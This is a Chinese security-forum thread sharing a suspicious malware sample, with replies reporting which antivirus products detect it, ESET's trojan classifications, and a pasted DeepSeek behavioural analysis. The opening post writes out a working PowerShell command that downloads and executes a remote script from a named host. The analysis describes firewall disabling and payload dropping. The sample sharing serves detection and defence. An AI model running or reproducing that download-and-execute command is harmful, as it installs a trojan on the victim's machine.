可疑代码脚本

显示全部楼层 · 发表于昨天 16:22

本帖最后由啊松于 2025-3-10 16:34 编辑

https://wwum.lanzoub.com/iGzrI2q6uh5c

powershell "$url='https://vip.123yx.com/1844947338/20250106/EG.ps1';try {iex(irm $url)}catch{$var=&'curl.exe' -s -L $url|Out-String;iex $var}"

卡巴标准版拦截下载

显示全部楼层 · 发表于昨天 16:31

360

显示全部楼层 · 发表于昨天 16:46

本帖最后由 lsop1349987 于 2025-3-10 16:54 编辑

eis+Avira运行miss

显示全部楼层 · 发表于昨天 20:05

火绒3.9

显示全部楼层 · 发表于昨天 20:51

DeepSeek引擎

脚本安全性分析及评分（1.00为最高风险）
文档1分析（PowerShell脚本）
1. 权限提升行为
- 脚本强制要求管理员权限，若未以管理员运行则会自我重启并绕过执行策略（`ExecutionPolicy Bypass`）。
- 风险：高。绕过权限限制可能用于恶意操作。
2. 系统服务操作
- 停止名为 `MessageTransfer` 的服务（可能为虚构服务名）。
- 风险：中。需确认服务真实性，但恶意软件常通过停止服务干扰安全防护。
3. 注册表清理
- 删除 `HKCU:\Software\...\Explorer` 下的 `RunMRU`、`RecentDocs` 等键值，清除用户操作记录。
- 风险：低。通常用于隐藏痕迹，但本身无害。
4. 安全策略篡改
- 关闭防火墙（`Set-NetFirewallProfile -Enabled False`）并禁用 Hyper-V。
- 风险：极高。直接削弱系统安全防护。
5. 进程终止行为
- 强制终止 `rundll32.exe` 进程（循环11次）。
- 风险：高。可能用于终止安全软件或驻留进程。
6. 远程文件下载与执行
- 从 `https://vip.123yx.com/.../EG.txt` 下载 Base64 编码文件，解码后保存为 `rundll32.exe`（覆盖系统文件）。
- 通过 `rundll32.exe` 执行恶意负载（`Start-Process rundll32.exe ...`）。
- 风险：极高。远程代码执行（RCE）是典型恶意行为，替换系统文件可能导致持久化攻击。
---
文档2分析（Base64编码二进制文件）
- 解码后为 PE 文件（Windows 可执行文件），但需动态分析确认具体行为。
- 风险：结合文档1的下载逻辑，该文件极可能是恶意负载（如远控木马、勒索软件）。
---
综合评分
风险等级：1.00（最高风险）
- 依据：
1. 提权、关闭防火墙、禁用 Hyper-V 直接破坏系统安全。
2. 下载并执行远程代码，覆盖系统关键文件（`rundll32.exe`）。
3. 行为符合高级持续性威胁（APT）特征，可能用于窃取数据或植入后门。
---
建议
- 立即隔离并删除该脚本及衍生文件（如 `EG.txt`）。
- 扫描系统是否存在 `rundll32.exe` 异常版本（路径 `C:\Windows\SysWOW64\`）。
- 检查防火墙状态和 Hyper-V 功能是否被篡改。
- 使用安全软件全面查杀，并监控网络连接（域名 `vip.123yx.com` 需加入黑名单）。

复制代码

显示全部楼层 · 发表于昨天 21:33

MD miss

显示全部楼层 · 发表于昨天 21:34

ESET 已上报
The detection for this threat will be included in the next update of detection engine 30847

EG.ps1 - PowerShell/TrojanDownloader.Agent.LJJ trojan

EG.txt » BASE64 » decoded.exe - Win32/FlyStudio.ORW trojan

显示全部楼层 · 发表于昨天 23:14

腾讯电脑管家 1X

[病毒样本] 可疑代码脚本

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源